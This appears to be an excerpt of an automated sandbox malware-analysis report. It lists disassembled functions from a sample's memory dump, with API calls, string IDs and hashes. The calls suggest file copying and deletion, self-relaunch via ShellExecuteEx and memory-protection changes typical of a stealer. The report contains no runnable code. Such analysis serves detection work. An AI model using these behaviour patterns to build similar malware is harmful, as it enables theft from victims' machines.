                                                            • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                            • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                            • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                            • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                            Function 00410765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrCmpCA.SHLWAPI(00000000,00876070), ref: 0041079A
                                                            • StrCmpCA.SHLWAPI(00000000,00876170), ref: 00410866
                                                            • StrCmpCA.SHLWAPI(00000000,00876120), ref: 0041099D
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy
                                                            • String ID: `_A
                                                            • API String ID: 3722407311-2339250863
                                                            • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                            • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                            • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                            • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                            Function 00416630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                            • ExitProcess.KERNEL32 ref: 00416755
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                            • String ID: <
                                                            • API String ID: 1148417306-4251816714
                                                            • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                            • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                            • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                            • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                            Function 022E6897 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 022E68CA
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 022E698D
                                                            • ExitProcess.KERNEL32 ref: 022E69BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                            • String ID: <
                                                            • API String ID: 1148417306-4251816714
                                                            • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                            • Instruction ID: e6fa43c86ec8a3706e9b48f3db0c3aa47226030db677f92b72f282516cf51e06
                                                            • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                            • Instruction Fuzzy Hash: AB3149B1911308ABDB14EFD0DD85FEEB77AAF54300F805189E206A6194DF746B88CF69
                                                            Function 00406BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID: @Jn@$Jn@$Jn@
                                                            • API String ID: 544645111-1180188686
                                                            • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                            • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                                            • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                            • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                                            Function 0041A920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                            • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcatlstrcpy
                                                            • String ID: vI@$vI@
                                                            • API String ID: 3905823039-1245421781
                                                            • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                            • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                            • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                            • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                            Function 00418D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                            • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                            • wsprintfW.USER32 ref: 00418D78
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocProcesswsprintf
                                                            • String ID: %hs
                                                            • API String ID: 659108358-2783943728
                                                            • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                            • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                            • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                            • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                            Function 0040A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                            • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                            • String ID:
                                                            • API String ID: 257331557-0
                                                            • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                            • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                            • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                            • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                            Function 022DA4C7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DA548
                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 022DA666
                                                            • lstrlen.KERNEL32(00000000), ref: 022DA923
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022DA9AA
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                            • String ID:
                                                            • API String ID: 257331557-0
                                                            • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                            • Instruction ID: b6c79350879f92eb4bb8617f3476c8bb7e2aa6d8e1f8e73475853970a2f51dcd
                                                            • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                            • Instruction Fuzzy Hash: 75E1BD729203189BCF19EBE4DD91DEEB33AAF64300F908159E157B2194EF346A48DF61
                                                            Function 0040D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                            • String ID:
                                                            • API String ID: 211194620-0
                                                            • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                            • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                            • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                            • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                            Function 022DD667 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DD6E8
                                                            • lstrlen.KERNEL32(00000000), ref: 022DD8FF
                                                            • lstrlen.KERNEL32(00000000), ref: 022DD913
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022DD992
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                            • String ID:
                                                            • API String ID: 211194620-0
                                                            • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                            • Instruction ID: 1b38d02df0154e398d0f8ec03b1e638ba83fe65b8f900dc65c0bee5badce6b20
                                                            • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                            • Instruction Fuzzy Hash: FD91CB72920318ABCF18EBE4DD95DFE733AAF64300F904169E507A6194EF346A48DF61
                                                            Function 0040D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                            • String ID:
                                                            • API String ID: 211194620-0
                                                            • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                            • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                                            • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                            • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                                            Function 022DD9E7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DDA68
                                                            • lstrlen.KERNEL32(00000000), ref: 022DDC06
                                                            • lstrlen.KERNEL32(00000000), ref: 022DDC1A
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022DDC99
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                            • String ID:
                                                            • API String ID: 211194620-0
                                                            • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                            • Instruction ID: 626f399f4d31656a7ebd68aae58d7b6b7cbd2d2cd3e1c2ec287d66d2709a4b82
                                                            • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                            • Instruction Fuzzy Hash: 8F81CA72920318ABCF08EBE4DD95DEE733AAF64300F90456DE107A6194EF346A48DF61
                                                            Function 0040F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
